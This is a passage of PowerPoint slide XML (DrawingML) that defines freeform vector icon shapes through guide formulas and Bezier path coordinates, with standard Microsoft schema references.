                <a:gd name="T123" fmla="*/ 14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" h="192">
                  <a:moveTo>
                    <a:pt x="188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4"/>
                    <a:pt x="17" y="192"/>
                    <a:pt x="40" y="192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0" y="192"/>
                    <a:pt x="160" y="192"/>
                    <a:pt x="160" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="192"/>
                    <a:pt x="200" y="174"/>
                    <a:pt x="200" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="12"/>
                    <a:pt x="200" y="12"/>
                    <a:pt x="200" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="0"/>
                    <a:pt x="200" y="0"/>
                    <a:pt x="200" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="188" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="32" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="150"/>
                    <a:pt x="28" y="159"/>
                    <a:pt x="22" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="159"/>
                    <a:pt x="12" y="150"/>
                    <a:pt x="12" y="140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32" y="48"/>
                    <a:pt x="32" y="48"/>
                    <a:pt x="32" y="48"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32" y="140"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="188" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="162"/>
                    <a:pt x="170" y="180"/>
                    <a:pt x="148" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="180"/>
                    <a:pt x="136" y="180"/>
                    <a:pt x="136" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="180"/>
                    <a:pt x="64" y="180"/>
                    <a:pt x="64" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="180"/>
                    <a:pt x="52" y="180"/>
                    <a:pt x="52" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="180"/>
                    <a:pt x="40" y="178"/>
                    <a:pt x="35" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="169"/>
                    <a:pt x="44" y="161"/>
                    <a:pt x="44" y="15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188" y="12"/>
                    <a:pt x="188" y="12"/>
                    <a:pt x="188" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="188" y="140"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="128"/>
                    <a:pt x="60" y="128"/>
                    <a:pt x="60" y="128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28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="108"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="108"/>
                    <a:pt x="60" y="108"/>
                    <a:pt x="60" y="108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08"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="88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100" y="100"/>
                    <a:pt x="100" y="100"/>
                    <a:pt x="100" y="100"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="88"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168" y="36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60" y="52"/>
                    <a:pt x="60" y="52"/>
                    <a:pt x="60" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="52"/>
                    <a:pt x="168" y="52"/>
                    <a:pt x="168" y="52"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="36"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="100" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="68"/>
                    <a:pt x="60" y="68"/>
                    <a:pt x="60" y="68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100" y="80"/>
                    <a:pt x="100" y="80"/>
                    <a:pt x="100" y="80"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="68"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="112" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="140"/>
                    <a:pt x="168" y="140"/>
                    <a:pt x="168" y="140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12" y="68"/>
                    <a:pt x="112" y="68"/>
                    <a:pt x="112" y="68"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="1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1" name="Freeform 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4AAAE4B-F60B-4C3C-9DB0-6B01CB55F3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4669559" flipH="1" flipV="1">
              <a:off x="4917663" y="6097573"/>
              <a:ext cx="742950" cy="744538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 198"/>
                <a:gd name="T1" fmla="*/ 46 h 198"/>
                <a:gd name="T2" fmla="*/ 152 w 198"/>
                <a:gd name="T3" fmla="*/ 4 h 198"/>
                <a:gd name="T4" fmla="*/ 3 w 198"/>
                <a:gd name="T5" fmla="*/ 152 h 198"/>
                <a:gd name="T6" fmla="*/ 46 w 198"/>
                <a:gd name="T7" fmla="*/ 195 h 198"/>
                <a:gd name="T8" fmla="*/ 60 w 198"/>
                <a:gd name="T9" fmla="*/ 195 h 198"/>
                <a:gd name="T10" fmla="*/ 113 w 198"/>
                <a:gd name="T11" fmla="*/ 142 h 198"/>
                <a:gd name="T12" fmla="*/ 112 w 198"/>
                <a:gd name="T13" fmla="*/ 112 h 198"/>
                <a:gd name="T14" fmla="*/ 139 w 198"/>
                <a:gd name="T15" fmla="*/ 115 h 198"/>
                <a:gd name="T16" fmla="*/ 195 w 198"/>
                <a:gd name="T17" fmla="*/ 60 h 198"/>
                <a:gd name="T18" fmla="*/ 195 w 198"/>
                <a:gd name="T19" fmla="*/ 46 h 198"/>
                <a:gd name="T20" fmla="*/ 92 w 198"/>
                <a:gd name="T21" fmla="*/ 142 h 198"/>
                <a:gd name="T22" fmla="*/ 63 w 198"/>
                <a:gd name="T23" fmla="*/ 172 h 198"/>
                <a:gd name="T24" fmla="*/ 43 w 198"/>
                <a:gd name="T25" fmla="*/ 172 h 198"/>
                <a:gd name="T26" fmla="*/ 33 w 198"/>
                <a:gd name="T27" fmla="*/ 162 h 198"/>
                <a:gd name="T28" fmla="*/ 33 w 198"/>
                <a:gd name="T29" fmla="*/ 142 h 198"/>
                <a:gd name="T30" fmla="*/ 63 w 198"/>
                <a:gd name="T31" fmla="*/ 112 h 198"/>
                <a:gd name="T32" fmla="*/ 83 w 198"/>
                <a:gd name="T33" fmla="*/ 112 h 198"/>
                <a:gd name="T34" fmla="*/ 92 w 198"/>
                <a:gd name="T35" fmla="*/ 122 h 198"/>
                <a:gd name="T36" fmla="*/ 92 w 198"/>
                <a:gd name="T37" fmla="*/ 142 h 198"/>
                <a:gd name="T38" fmla="*/ 172 w 198"/>
                <a:gd name="T39" fmla="*/ 63 h 198"/>
                <a:gd name="T40" fmla="*/ 142 w 198"/>
                <a:gd name="T41" fmla="*/ 93 h 198"/>
                <a:gd name="T42" fmla="*/ 122 w 198"/>
                <a:gd name="T43" fmla="*/ 93 h 198"/>
                <a:gd name="T44" fmla="*/ 112 w 198"/>
                <a:gd name="T45" fmla="*/ 83 h 198"/>
                <a:gd name="T46" fmla="*/ 112 w 198"/>
                <a:gd name="T47" fmla="*/ 63 h 198"/>
                <a:gd name="T48" fmla="*/ 142 w 198"/>
                <a:gd name="T49" fmla="*/ 33 h 198"/>
                <a:gd name="T50" fmla="*/ 162 w 198"/>
                <a:gd name="T51" fmla="*/ 33 h 198"/>
                <a:gd name="T52" fmla="*/ 172 w 198"/>
                <a:gd name="T53" fmla="*/ 43 h 198"/>
                <a:gd name="T54" fmla="*/ 172 w 198"/>
                <a:gd name="T55" fmla="*/ 63 h 198"/>
                <a:gd name="T56" fmla="*/ 31 w 198"/>
                <a:gd name="T57" fmla="*/ 91 h 198"/>
                <a:gd name="T58" fmla="*/ 44 w 198"/>
                <a:gd name="T59" fmla="*/ 83 h 198"/>
                <a:gd name="T60" fmla="*/ 30 w 198"/>
                <a:gd name="T61" fmla="*/ 74 h 198"/>
                <a:gd name="T62" fmla="*/ 14 w 198"/>
                <a:gd name="T63" fmla="*/ 91 h 198"/>
                <a:gd name="T64" fmla="*/ 0 w 198"/>
                <a:gd name="T65" fmla="*/ 148 h 198"/>
                <a:gd name="T66" fmla="*/ 26 w 198"/>
                <a:gd name="T67" fmla="*/ 122 h 198"/>
                <a:gd name="T68" fmla="*/ 31 w 198"/>
                <a:gd name="T69" fmla="*/ 91 h 198"/>
                <a:gd name="T70" fmla="*/ 83 w 198"/>
                <a:gd name="T71" fmla="*/ 45 h 198"/>
                <a:gd name="T72" fmla="*/ 91 w 198"/>
                <a:gd name="T73" fmla="*/ 31 h 198"/>
                <a:gd name="T74" fmla="*/ 122 w 198"/>
                <a:gd name="T75" fmla="*/ 27 h 198"/>
                <a:gd name="T76" fmla="*/ 148 w 198"/>
                <a:gd name="T77" fmla="*/ 0 h 198"/>
                <a:gd name="T78" fmla="*/ 91 w 198"/>
                <a:gd name="T79" fmla="*/ 14 h 198"/>
                <a:gd name="T80" fmla="*/ 74 w 198"/>
                <a:gd name="T81" fmla="*/ 30 h 198"/>
                <a:gd name="T82" fmla="*/ 83 w 198"/>
                <a:gd name="T83" fmla="*/ 4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98">
                  <a:moveTo>
                    <a:pt x="195" y="46"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="4"/>
                    <a:pt x="152" y="4"/>
                    <a:pt x="152" y="4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6" y="195"/>
                    <a:pt x="46" y="195"/>
                    <a:pt x="46" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="198"/>
                    <a:pt x="56" y="198"/>
                    <a:pt x="60" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="195"/>
                    <a:pt x="85" y="169"/>
                    <a:pt x="113" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="137"/>
                    <a:pt x="107" y="117"/>
                    <a:pt x="112" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="107"/>
                    <a:pt x="135" y="119"/>
                    <a:pt x="139" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="86"/>
                    <a:pt x="195" y="60"/>
                    <a:pt x="195" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="56"/>
                    <a:pt x="198" y="50"/>
                    <a:pt x="195" y="46"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="92" y="142"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="172"/>
                    <a:pt x="63" y="172"/>
                    <a:pt x="63" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="177"/>
                    <a:pt x="48" y="177"/>
                    <a:pt x="43" y="172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28" y="156"/>
                    <a:pt x="28" y="148"/>
                    <a:pt x="33" y="14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8" y="107"/>
                    <a:pt x="77" y="107"/>
                    <a:pt x="83" y="112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98" y="128"/>
                    <a:pt x="98" y="137"/>
                    <a:pt x="92" y="142"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="172" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="93"/>
                    <a:pt x="142" y="93"/>
                    <a:pt x="142" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="98"/>
                    <a:pt x="128" y="98"/>
                    <a:pt x="122" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="83"/>
                    <a:pt x="112" y="83"/>
                    <a:pt x="112" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="77"/>
                    <a:pt x="107" y="68"/>
                    <a:pt x="112" y="6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7" y="28"/>
                    <a:pt x="156" y="28"/>
                    <a:pt x="162" y="3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7" y="49"/>
                    <a:pt x="177" y="57"/>
                    <a:pt x="172" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="31" y="91"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="86"/>
                    <a:pt x="41" y="87"/>
                    <a:pt x="44" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="78"/>
                    <a:pt x="38" y="75"/>
                    <a:pt x="30" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="72"/>
                    <a:pt x="17" y="82"/>
                    <a:pt x="14" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="100"/>
                    <a:pt x="0" y="148"/>
                    <a:pt x="0" y="148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2"/>
                    <a:pt x="26" y="97"/>
                    <a:pt x="31" y="91"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="83" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="41"/>
                    <a:pt x="85" y="37"/>
                    <a:pt x="91" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="26"/>
                    <a:pt x="122" y="27"/>
                    <a:pt x="122" y="2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00" y="12"/>
                    <a:pt x="91" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="17"/>
                    <a:pt x="72" y="22"/>
                    <a:pt x="74" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="38"/>
                    <a:pt x="78" y="48"/>
                    <a:pt x="83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2" name="Freeform 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B9C5334-F352-492A-AF46-ABED2BF7C7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36245" flipH="1" flipV="1">
              <a:off x="4535125" y="5906200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3" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1EBDFB-B640-490F-BEE9-8688CC5C4226}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="20193509" flipH="1" flipV="1">
              <a:off x="3003208" y="5577558"/>
              <a:ext cx="314410" cy="448364"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 176 w 190"/>
                <a:gd name="T1" fmla="*/ 101 h 272"/>
                <a:gd name="T2" fmla="*/ 178 w 190"/>
                <a:gd name="T3" fmla="*/ 82 h 272"/>
                <a:gd name="T4" fmla="*/ 96 w 190"/>
                <a:gd name="T5" fmla="*/ 0 h 272"/>
                <a:gd name="T6" fmla="*/ 14 w 190"/>
                <a:gd name="T7" fmla="*/ 82 h 272"/>
                <a:gd name="T8" fmla="*/ 17 w 190"/>
                <a:gd name="T9" fmla="*/ 103 h 272"/>
                <a:gd name="T10" fmla="*/ 0 w 190"/>
                <a:gd name="T11" fmla="*/ 272 h 272"/>
                <a:gd name="T12" fmla="*/ 190 w 190"/>
                <a:gd name="T13" fmla="*/ 272 h 272"/>
                <a:gd name="T14" fmla="*/ 176 w 190"/>
                <a:gd name="T15" fmla="*/ 10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272">
                  <a:moveTo>
                    <a:pt x="176" y="101"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="95"/>
                    <a:pt x="178" y="89"/>
                    <a:pt x="178" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="37"/>
                    <a:pt x="141" y="0"/>
                    <a:pt x="96" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="0"/>
                    <a:pt x="14" y="37"/>
                    <a:pt x="14" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="89"/>
                    <a:pt x="15" y="96"/>
                    <a:pt x="17" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="135"/>
                    <a:pt x="66" y="224"/>
                    <a:pt x="0" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="272"/>
                    <a:pt x="190" y="272"/>
                    <a:pt x="190" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="227"/>
                    <a:pt x="174" y="133"/>
                    <a:pt x="176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4" name="Freeform 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80535F05-7D77-48F7-9B4B-D5EB4F5978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187272" flipH="1" flipV="1">
              <a:off x="482235" y="6053258"/>
              <a:ext cx="696926" cy="867919"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 452 w 452"/>
                <a:gd name="T1" fmla="*/ 402 h 564"/>
                <a:gd name="T2" fmla="*/ 367 w 452"/>
                <a:gd name="T3" fmla="*/ 269 h 564"/>
                <a:gd name="T4" fmla="*/ 360 w 452"/>
                <a:gd name="T5" fmla="*/ 135 h 564"/>
                <a:gd name="T6" fmla="*/ 226 w 452"/>
                <a:gd name="T7" fmla="*/ 0 h 564"/>
                <a:gd name="T8" fmla="*/ 92 w 452"/>
                <a:gd name="T9" fmla="*/ 135 h 564"/>
                <a:gd name="T10" fmla="*/ 85 w 452"/>
                <a:gd name="T11" fmla="*/ 269 h 564"/>
                <a:gd name="T12" fmla="*/ 0 w 452"/>
                <a:gd name="T13" fmla="*/ 402 h 564"/>
                <a:gd name="T14" fmla="*/ 83 w 452"/>
                <a:gd name="T15" fmla="*/ 406 h 564"/>
                <a:gd name="T16" fmla="*/ 83 w 452"/>
                <a:gd name="T17" fmla="*/ 558 h 564"/>
                <a:gd name="T18" fmla="*/ 83 w 452"/>
                <a:gd name="T19" fmla="*/ 564 h 564"/>
                <a:gd name="T20" fmla="*/ 369 w 452"/>
                <a:gd name="T21" fmla="*/ 564 h 564"/>
                <a:gd name="T22" fmla="*/ 369 w 452"/>
                <a:gd name="T23" fmla="*/ 552 h 564"/>
                <a:gd name="T24" fmla="*/ 369 w 452"/>
                <a:gd name="T25" fmla="*/ 552 h 564"/>
                <a:gd name="T26" fmla="*/ 369 w 452"/>
                <a:gd name="T27" fmla="*/ 406 h 564"/>
                <a:gd name="T28" fmla="*/ 452 w 452"/>
                <a:gd name="T29" fmla="*/ 402 h 564"/>
                <a:gd name="T30" fmla="*/ 265 w 452"/>
                <a:gd name="T31" fmla="*/ 69 h 564"/>
                <a:gd name="T32" fmla="*/ 293 w 452"/>
                <a:gd name="T33" fmla="*/ 98 h 564"/>
                <a:gd name="T34" fmla="*/ 265 w 452"/>
                <a:gd name="T35" fmla="*/ 126 h 564"/>
                <a:gd name="T36" fmla="*/ 237 w 452"/>
                <a:gd name="T37" fmla="*/ 98 h 564"/>
                <a:gd name="T38" fmla="*/ 265 w 452"/>
                <a:gd name="T39" fmla="*/ 69 h 564"/>
                <a:gd name="T40" fmla="*/ 226 w 452"/>
                <a:gd name="T41" fmla="*/ 135 h 564"/>
                <a:gd name="T42" fmla="*/ 293 w 452"/>
                <a:gd name="T43" fmla="*/ 181 h 564"/>
                <a:gd name="T44" fmla="*/ 226 w 452"/>
                <a:gd name="T45" fmla="*/ 228 h 564"/>
                <a:gd name="T46" fmla="*/ 159 w 452"/>
                <a:gd name="T47" fmla="*/ 181 h 564"/>
                <a:gd name="T48" fmla="*/ 224 w 452"/>
                <a:gd name="T49" fmla="*/ 137 h 564"/>
                <a:gd name="T50" fmla="*/ 226 w 452"/>
                <a:gd name="T51" fmla="*/ 135 h 564"/>
                <a:gd name="T52" fmla="*/ 187 w 452"/>
                <a:gd name="T53" fmla="*/ 69 h 564"/>
                <a:gd name="T54" fmla="*/ 216 w 452"/>
                <a:gd name="T55" fmla="*/ 98 h 564"/>
                <a:gd name="T56" fmla="*/ 187 w 452"/>
                <a:gd name="T57" fmla="*/ 126 h 564"/>
                <a:gd name="T58" fmla="*/ 159 w 452"/>
                <a:gd name="T59" fmla="*/ 98 h 564"/>
                <a:gd name="T60" fmla="*/ 187 w 452"/>
                <a:gd name="T61" fmla="*/ 69 h 564"/>
                <a:gd name="T62" fmla="*/ 116 w 452"/>
                <a:gd name="T63" fmla="*/ 552 h 564"/>
                <a:gd name="T64" fmla="*/ 159 w 452"/>
                <a:gd name="T65" fmla="*/ 527 h 564"/>
                <a:gd name="T66" fmla="*/ 202 w 452"/>
                <a:gd name="T67" fmla="*/ 552 h 564"/>
                <a:gd name="T68" fmla="*/ 116 w 452"/>
                <a:gd name="T69" fmla="*/ 552 h 564"/>
                <a:gd name="T70" fmla="*/ 214 w 452"/>
                <a:gd name="T71" fmla="*/ 552 h 564"/>
                <a:gd name="T72" fmla="*/ 159 w 452"/>
                <a:gd name="T73" fmla="*/ 515 h 564"/>
                <a:gd name="T74" fmla="*/ 131 w 452"/>
                <a:gd name="T75" fmla="*/ 520 h 564"/>
                <a:gd name="T76" fmla="*/ 133 w 452"/>
                <a:gd name="T77" fmla="*/ 381 h 564"/>
                <a:gd name="T78" fmla="*/ 229 w 452"/>
                <a:gd name="T79" fmla="*/ 267 h 564"/>
                <a:gd name="T80" fmla="*/ 321 w 452"/>
                <a:gd name="T81" fmla="*/ 386 h 564"/>
                <a:gd name="T82" fmla="*/ 322 w 452"/>
                <a:gd name="T83" fmla="*/ 523 h 564"/>
                <a:gd name="T84" fmla="*/ 289 w 452"/>
                <a:gd name="T85" fmla="*/ 515 h 564"/>
                <a:gd name="T86" fmla="*/ 233 w 452"/>
                <a:gd name="T87" fmla="*/ 552 h 564"/>
                <a:gd name="T88" fmla="*/ 214 w 452"/>
                <a:gd name="T89" fmla="*/ 552 h 564"/>
                <a:gd name="T90" fmla="*/ 246 w 452"/>
                <a:gd name="T91" fmla="*/ 552 h 564"/>
                <a:gd name="T92" fmla="*/ 289 w 452"/>
                <a:gd name="T93" fmla="*/ 527 h 564"/>
                <a:gd name="T94" fmla="*/ 332 w 452"/>
                <a:gd name="T95" fmla="*/ 552 h 564"/>
                <a:gd name="T96" fmla="*/ 246 w 452"/>
                <a:gd name="T97" fmla="*/ 55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2" h="564">
                  <a:moveTo>
                    <a:pt x="452" y="402"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="395" y="372"/>
                    <a:pt x="373" y="323"/>
                    <a:pt x="367" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="209"/>
                    <a:pt x="364" y="156"/>
                    <a:pt x="360" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="62"/>
                    <a:pt x="313" y="0"/>
                    <a:pt x="226" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="0"/>
                    <a:pt x="104" y="62"/>
                    <a:pt x="92" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="156"/>
                    <a:pt x="86" y="209"/>
                    <a:pt x="85" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="323"/>
                    <a:pt x="57" y="372"/>
                    <a:pt x="0" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="402"/>
                    <a:pt x="42" y="426"/>
                    <a:pt x="83" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="465"/>
                    <a:pt x="83" y="558"/>
                    <a:pt x="83" y="558"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="564"/>
                    <a:pt x="83" y="564"/>
                    <a:pt x="83" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="564"/>
                    <a:pt x="369" y="564"/>
                    <a:pt x="369" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="552"/>
                    <a:pt x="369" y="552"/>
                    <a:pt x="369" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="552"/>
                    <a:pt x="369" y="552"/>
                    <a:pt x="369" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="530"/>
                    <a:pt x="369" y="456"/>
                    <a:pt x="369" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="426"/>
                    <a:pt x="452" y="402"/>
                    <a:pt x="452" y="402"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="265" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="69"/>
                    <a:pt x="293" y="82"/>
                    <a:pt x="293" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="113"/>
                    <a:pt x="281" y="126"/>
                    <a:pt x="265" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="126"/>
                    <a:pt x="237" y="113"/>
                    <a:pt x="237" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="82"/>
                    <a:pt x="249" y="69"/>
                    <a:pt x="265" y="69"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="226" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="181"/>
                    <a:pt x="293" y="181"/>
                    <a:pt x="293" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="228"/>
                    <a:pt x="226" y="228"/>
                    <a:pt x="226" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="181"/>
                    <a:pt x="159" y="181"/>
                    <a:pt x="159" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="137"/>
                    <a:pt x="224" y="137"/>
                    <a:pt x="224" y="137"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="226" y="135"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="187" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="69"/>
                    <a:pt x="216" y="82"/>
                    <a:pt x="216" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="113"/>
                    <a:pt x="203" y="126"/>
                    <a:pt x="187" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="126"/>
                    <a:pt x="159" y="113"/>
                    <a:pt x="159" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="82"/>
                    <a:pt x="171" y="69"/>
                    <a:pt x="187" y="69"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="552"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="543"/>
                    <a:pt x="129" y="527"/>
                    <a:pt x="159" y="527"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="527"/>
                    <a:pt x="198" y="543"/>
                    <a:pt x="202" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="552"/>
                    <a:pt x="128" y="552"/>
                    <a:pt x="116" y="552"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="214" y="552"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="540"/>
                    <a:pt x="199" y="515"/>
                    <a:pt x="159" y="515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="515"/>
                    <a:pt x="138" y="517"/>
                    <a:pt x="131" y="520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="478"/>
                    <a:pt x="132" y="411"/>
                    <a:pt x="133" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="328"/>
                    <a:pt x="155" y="267"/>
                    <a:pt x="229" y="267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="267"/>
                    <a:pt x="318" y="328"/>
                    <a:pt x="321" y="386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="410"/>
                    <a:pt x="322" y="480"/>
                    <a:pt x="322" y="523"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="314" y="518"/>
                    <a:pt x="303" y="515"/>
